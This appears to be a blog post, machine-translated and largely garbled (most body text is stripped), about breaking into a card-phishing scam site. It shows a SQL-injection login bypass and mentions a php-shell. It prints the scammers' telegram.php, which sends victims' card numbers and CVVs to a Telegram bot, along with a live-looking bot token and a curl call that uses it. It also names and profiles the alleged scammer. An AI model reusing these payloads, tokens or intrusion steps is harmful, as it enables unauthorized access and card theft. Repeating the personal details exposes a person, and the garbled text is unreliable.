注解
我们每个人都可能成为攻击者的受害者,但有时掠食者和猎物会改变地方。
这是一个简短的故事,内容是关于技术的愚蠢使用如何导致人格披露。 这篇文章对想要获得“轻松赚钱”的年轻黑客以及想要抓住它们的年轻人都是有用的。
引言
2月的一个晚上,我正忙着与爱人寻找浪漫约会的地方。 一段时间后,我被吸引到了
milleniumfilm.ru站点,该站点目前不可用。 该站点为小型电影院提供了租赁服务,供私人观看。 漂亮的图片,合理的价格,有在线支持,但还有一件事:有人建议在同一域的未保护页面上输入银行卡数据。 谨慎起见,我写信给网站的技术支持,骗子们并没有花很长时间等待-意识到我在技术上足够胜任,他们给了我3封信。 当然,骗子没有道理在我身上浪费时间,但是为什么这么无礼? -在任何情况下,您都需要保持男人身份。
您可以在以下位置找到有关同一计划的站点的评论:
zhaloba-online.ru 。 其中一些甚至还可以工作。
骇客
感到普遍的不公正,为了确立攻击者的身份并压制其活动,我开始研究该站点的漏洞。
我用手指指着天空,输入
的第一个地址将我带到
管理面板 ,该
面板礼貌地要求我输入“登录”和“密码”。
第一次尝试SQL注入想到的第一个密码
1' or '1
.
., .
Gelloiss.ru . « » — : , , , cvc2 .
., 3D-secure, . , . , 3D-secure . , , .
« » - . , php-shell.
/images/,
login.php. , .
telegram.php.
.$ cat telegram.php
<?
function send_mess($text) {
$token = "626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs";
$mess = $text;
$chat = "-302359340";
/*return "<iframe style='width:500px; height:500px;' src='https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess."'></iframe>";*/
file_get_contents("https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess);
}
PHP - send_mess. , - , .
grep./cart.php:22:send_mess(" : ".$name."%0D%0AEmail: ".$email."%0D%0A: ".$phone."%0D%0A : ".$date."%0D%0A".": ".$time."%0D%0A: ".$city."%0D%0A: ".$sum."%0D%0A : ".$services."%0D%0AIP: ".$ip."%0D%0A: ".$link_ban_ip);
./pay/ms.php:21: send_mess(": ".$sum."%0D%0A : ".$name."%0D%0A : ".$num."%0D%0A , : ".$month."%0D%0A: ".$year."%0D%0Acvv: ".$cvv);
, -, chat_id, skype «ura7887» telegram «Gelloiss» ( telegram , telegram-
).
, , .
curl$ curl "https://api.telegram.org/bot626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs/getChatAdministrators?chat_id=-302359340"
{"ok":true,"result":[{"user":{"id":365019332,"is_bot":false,"first_name":"Iskr\u00e1","username":"Gelloiss","language_code":"ru"},"status":"creator"}]}
username — «gelloiss».
: ! : «gelloiss», «ura7887»,
, «Gelloiss.ru», skype «ura7887».
:
vk.com , 6 , 14 .
anime.anidub.com.
blackhacker.ru, .
telegram
,
Gelloiss.ru telegram, telegram- . , telegram- .
shell$ sha256sum <<< "i'm carder yuri iskra."
a4e0bb4a6d6a214cadd6f6fa96d91c1401d50f01a5cc157b2f56079400e24af8 -
telegram :
a4e0bb4a6d6a214cadd6f6fa96d91c1401d50f01a5cc157b2f56079400e24af8 .
, . , 100 , +100.
, «». « »
.
, . : 3 - 13 . , - , 2 . , , . ,
moneyonline.world.
Update 2019-04-21:
gelloiss , , , telegram:
Message(id=31, grouped_id=None, from_id=898775249, edit_date=None, message=' « » ', to_id=PeerUser(user_id=365019332), entities=[], fwd_from=None, views=None, media=None, post=False, media_unread=False, out=True, date=datetime.datetime(2019, 4, 19, 9, 36, 15, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),
Message(id=33, grouped_id=None, from_id=365019332, edit_date=None, message='moneyonline.world/pay/?pay=123\n ?)) \n ', to_id=PeerUser(user_id=898775249), entities=[MessageEntityUrl(offset=0, length=38)], fwd_from=None, views=None, media=MessageMediaWebPage(webpage=WebPage(id=8004451420650727228, hash=0, photo=None, description='MoneyOnline.com ‒ , . , , . , .', embed_height=None, embed_width=None, document=None, embed_type=None, site_name='MoneyOnline', cached_page=None, url='https://moneyonline.world/pay/?pay=123', display_url='moneyonline.world/ru', duration=None, author=None, embed_url=None, title='MoneyOnline | , , ', type='article')), post=False, media_unread=False, out=False, date=datetime.datetime(2019, 4, 19, 9, 37, 53, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),